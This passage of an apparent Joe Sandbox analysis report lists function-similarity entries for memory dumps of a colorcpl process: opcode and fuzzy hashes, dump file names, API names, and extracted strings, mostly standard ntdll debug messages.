                                                                                                        • Opcode Fuzzy Hash: 524a4cc9d017a482e392474aed3d51c5eb61382361212565f647ce13c9b8d914
                                                                                                        • Instruction Fuzzy Hash: 1751D479A00745AFCB34DF5CC8A897FF7FAAF44200B44985AF496D7681E6B4DA408B60
                                                                                                        Strings
                                                                                                        • Execute=1, xrefs: 052C4713
                                                                                                        • ExecuteOptions, xrefs: 052C46A0
                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 052C4725
                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 052C4787
                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 052C46FC
                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 052C4655
                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 052C4742
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                        • API String ID: 0-484625025
                                                                                                        • Opcode ID: 78bf92ca51b8c232e60ce571cf0cdd4163ab0192d50ec3d67d6b530c658eb6e3
                                                                                                        • Instruction ID: 52634b18e83dcd56732b44279acf64b5695aa654723efcfb5ec1f0a35f20f0f9
                                                                                                        • Opcode Fuzzy Hash: 78bf92ca51b8c232e60ce571cf0cdd4163ab0192d50ec3d67d6b530c658eb6e3
                                                                                                        • Instruction Fuzzy Hash: A35118356212197AEF10FBE49C9AFBA77A9FF04304F180099D50AA71D1DB729A45CE60
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158168092.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5140000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: G)3G$G0(0$QIU\$QIWI$QIWN$QS\G$RIWG$UQIW$VWVG$WIU$WVWW
                                                                                                        • API String ID: 0-3237216922
                                                                                                        • Opcode ID: 0101aa6a1e9d4250d2d5c20a9ff30ae71b440874b8718c4f298eb99cbf6dd478
                                                                                                        • Instruction ID: 6936418ca3de4ec271b25226222512a9b8af03b44077a31d624e18fb03e1b1ff
                                                                                                        • Opcode Fuzzy Hash: 0101aa6a1e9d4250d2d5c20a9ff30ae71b440874b8718c4f298eb99cbf6dd478
                                                                                                        • Instruction Fuzzy Hash: C121FEB0C1468D9ACB10DF91D9996EEFFB1FB04308F258058C969AF650C7755A8ACF80
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                        • Instruction ID: adcb239add261e5a8d92541955f3cdb5a467847085ad335410a1ddcb749c2091
                                                                                                        • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                        • Instruction Fuzzy Hash: 15022371608751AFC709DF18C994A6FBBE5FFC8700F14892DB9898B264DB71E905CB82
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-$0$0
                                                                                                        • API String ID: 1302938615-699404926
                                                                                                        • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                        • Instruction ID: 9acb2dde03fa6d84cc137ba89edc3bb3039b112ce4df786b7a304f34e827932b
                                                                                                        • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                        • Instruction Fuzzy Hash: 2581A175E2D24A9EDF2CCF68E8917FEBBA2BF45310F184219D895A7390C7749840CB51
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                        • API String ID: 48624451-2819853543
                                                                                                        • Opcode ID: 60344ccd7ef4c9a3908daf65603ea97b3d8dd3a0326b3418e06cc1433fe3396b
                                                                                                        • Instruction ID: 050f6fbb03c9ce32c2fbfdaaf775d5f11273cf1244fba47dbb2cea13f85ddebd
                                                                                                        • Opcode Fuzzy Hash: 60344ccd7ef4c9a3908daf65603ea97b3d8dd3a0326b3418e06cc1433fe3396b
                                                                                                        • Instruction Fuzzy Hash: 1521747AA10219ABDB14DF79CC58AFFBBF9EF54644F040116F905E3240EB70D9018BA1
                                                                                                        Strings
                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 052C02BD
                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 052C02E7
                                                                                                        • RTL: Re-Waiting, xrefs: 052C031E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                        • API String ID: 0-2474120054
                                                                                                        • Opcode ID: 12acd6a84d69061b44131ee4db2de289acdcca3726bb8ab14b4ed985176824bd
                                                                                                        • Instruction ID: 6b28860025a478be68a9f421b55c659a9b9b6dbec914b7547268c4e92943ab0e
                                                                                                        • Opcode Fuzzy Hash: 12acd6a84d69061b44131ee4db2de289acdcca3726bb8ab14b4ed985176824bd
                                                                                                        • Instruction Fuzzy Hash: 17E1B130628746DFD725CF28C988B2ABBE1BF84314F140A5DF5AA8B2D1D774E944CB52
                                                                                                        Strings
                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 052C7B7F
                                                                                                        • RTL: Resource at %p, xrefs: 052C7B8E
                                                                                                        • RTL: Re-Waiting, xrefs: 052C7BAC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 0-871070163
                                                                                                        • Opcode ID: 47bee25955cc9170c27b83526c6092b21c88accb02b66f71ef9a68dc6ab25a15
                                                                                                        • Instruction ID: 1b1ab5de61cfee4f8e68d8e97ba663797515caf40793025a413792550027c689
                                                                                                        • Opcode Fuzzy Hash: 47bee25955cc9170c27b83526c6092b21c88accb02b66f71ef9a68dc6ab25a15
                                                                                                        • Instruction Fuzzy Hash: 1741D0357267029FC724EE25C844B7AB7E6FF98710F040A2DF85A9B681DB71E4058B91
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 052C728C
                                                                                                        Strings
                                                                                                        • RTL: Resource at %p, xrefs: 052C72A3
                                                                                                        • RTL: Re-Waiting, xrefs: 052C72C1
                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 052C7294
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 885266447-605551621
                                                                                                        • Opcode ID: 29abab3992ec511d05d984d22fb7751dc0964edab610fbe2279295bfe8e2dd03
                                                                                                        • Instruction ID: 7da780f0d4037c8f40bd1daa460e7267480b72ed2c458f4e6c130db8181ac191
                                                                                                        • Opcode Fuzzy Hash: 29abab3992ec511d05d984d22fb7751dc0964edab610fbe2279295bfe8e2dd03
                                                                                                        • Instruction Fuzzy Hash: 8341DE35725602ABC721DE65CC46F66BBA6FF44710F18061DF85AAB381DB31E8068BD2
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$]:%u
                                                                                                        • API String ID: 48624451-3050659472
                                                                                                        • Opcode ID: 67b6daba4dad04400f37f01d2bc065cfb2c6684ea0eb511b40e1b000fcc5c7ec
                                                                                                        • Instruction ID: 1269f1047eea74c8738ad537fec49a63b50094b7bf6d08f2aac0431c7c905200
                                                                                                        • Opcode Fuzzy Hash: 67b6daba4dad04400f37f01d2bc065cfb2c6684ea0eb511b40e1b000fcc5c7ec
                                                                                                        • Instruction Fuzzy Hash: 74317376A102199FCB24DE69CC54BEFB7A8BF44610F445595F849E3280EB30AA448FA0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-
                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                        • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                        • Instruction ID: fac96266df2f22bcb1a85b377734d010989fa2bfa28ee2efa6e27d2cee74c51a
                                                                                                        • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                        • Instruction Fuzzy Hash: 72919370E342169BDF2CDE69C881ABEB7A6FF46720F1C451AE859B73C0D77099418760
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$@
                                                                                                        • API String ID: 0-1194432280
                                                                                                        • Opcode ID: fd9c83e286e74e75c4d7cf81d8f4b10b690f669eba71a08db79f1d584ed4c808
                                                                                                        • Instruction ID: 04e70185e052802fb888be673a172bc8c482af8c113c1f7c9f669ef33d99a7b4
                                                                                                        • Opcode Fuzzy Hash: fd9c83e286e74e75c4d7cf81d8f4b10b690f669eba71a08db79f1d584ed4c808
                                                                                                        • Instruction Fuzzy Hash: 2F811AB5D20269DBDB25CB54CC45BEEB7B8AF08750F0041EAA91DB7240D7709E84CFA4